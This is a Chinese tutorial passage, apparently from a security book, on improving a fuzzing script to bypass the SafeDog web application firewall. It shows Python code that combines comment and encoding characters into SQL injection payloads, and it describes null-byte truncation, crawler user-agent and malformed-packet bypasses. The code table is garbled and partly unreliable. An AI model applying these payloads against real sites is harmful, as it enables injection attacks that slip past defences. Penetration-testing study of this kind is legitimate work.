绕过安全狗优化

8.2节中,我们已经完成模糊测试绕过安全狗脚本,其中仅仅对数字进行了模 糊处理,如此已经能够产生许多绕过安全狗的方法,如果需要更多的绕过安全狗 方法,可在此脚本的基础上进行修改,完善此脚本。

完善的思路是从脚本本身的参数值和ua值进行增加,比如在原有ua的基础 上,列举多种ua进行迭代,然后对参数本身可以采用多重套用的方式:

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---|------------------------|
| def fuzzexp(url) : fuzzing_x = [ '/* ', '*/ ', '/* ! ', '* ', '= ', '` ', ' ! ', '@ ', '% ', '+ ', ' | ', '%00 '] fuzzing_y = [ ' ', ' '] fuzzing_z = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0i", "%0j"] fuzz = fuzzing_x + fuzzing_y + fuzzing_z ua = UserAgent() headers = ua .firefox for a in fuzz: for b in fuzz: for c in fuzz: for d in fuzz: exp = "/* !" + a + b + c + d + "and*/ 'a '= 'a--+" || ' ' ' ' - . , , "%0h", |
| 将fuzz的相关内联注释语句放入数组中: |||
| fuzzing_x = [ '/* ', '*/ ', '/* ! '+ ', ' | ', '%00 '] fuzzing_y = [ ' ', ' ' fuzzing_z = ["%0a", "%0b" "%0i", "%0j"] fuzz = fuzzing_x + fuzzing_y + fuzzing_z | '@ ', '% ', ' . ', '- ', "%0f", "%0g", "%0h", ||
| 优化ua的随机化,可以使用fake-useragent实现: |||
| ua = UserAgent() headers = ua .firefox |||
| 将先前放入数组中的内联注释符号取出并拼接到一起: |||
| for a in fuzz: for b in fuzz: for c in fuzz: for d in fuzz: exp = "/* !" + a + b + c + d + "and*/ 'a '= 'a--+" |||

如此便完成了脚本的基本优化,增加了更多的组合性,可以测试出更多绕过

安全狗的脚本。通过多种联合注释符号组合来有效地绕过安全狗,发挥组合的优 势,将更有可能成功。

常见的绕过安全狗的方式有4种:利用string绕过、利用user-agent绕过、利用 MySQL语法和html的特殊性绕过、利用畸形数据包绕过。下面分别介绍。

1.利用string的绕过

C语言在使用string等结构存储请求时,当进行解码时,%00会被识别替换为 NULL ,这样便导致了请求包的内容会被在构造后截断。例如:

str=1%00%20and%20a=a

当后端的校验存储使用了string等结构后,上述请求会被解析截断为str=1 ,从 而绕过监测。

2.利用user-agent绕过

在WAF应用程序进行防护的时候,一部分防护厂商会对某些user-agent进行特 殊放行,例如百度爬虫的user-agent 。测试时可以利用这部分特殊性绕过安全狗。

3.利用MySQL语法和HTML的特殊性绕过

利用MySQL的语法特性,"/*"和"*/" 中间的内容将会被视为注释而不进行操 作。例如,"9.0union"监测到参数为浮点数时语句结束,被当作空格执行。结合 HTML的写法,如url编码后的%20表示空格等思路进行绕过。

4.畸形数据包绕过

利用Apache对于HTTP数据包的兼容性以及对防护软件的不兼容性来绕过 WAF。

相关推荐
William Dawson14 小时前
2026软考中级系统集成项目管理工程师备考笔记
笔记·系统集成项目管理工程师
love530love17 小时前
精简版|Claude-HUD 插件介绍 + 一键安装教程
人工智能·windows·笔记
想成为优秀工程师的爸爸18 小时前
第三十篇技术笔记:郭大侠学UDS - 人有生老三千疾,望闻问切良方医
网络·笔记·网络协议·tcp/ip·信息与通信
tq108619 小时前
数学:约束表征空间的最小闭包
笔记
freexyn20 小时前
Matlab自学笔记七十六:表达式的展开、因式分解、化简、合并同类项
笔记·算法·matlab
IT摆渡者1 天前
linux 系统安全检查
运维·网络·经验分享·笔记
十安_数学好题速析1 天前
【多选】曲线方程:四步避坑判断曲线类型
笔记·学习·高考
chase。1 天前
【学习笔记】skrl: 模块化、灵活的强化学习库深度解析
笔记·学习
其实防守也摸鱼1 天前
CSDN博客写什么?从0到1打造你的技术影响力
笔记·测试用例·博客·教程·ai写作·ai辅助·高质量
EQ-雪梨蛋花汤1 天前
【Unity笔记】Unity 音游模板与免费资源:高效构建节奏游戏开发全指南
笔记·unity·游戏引擎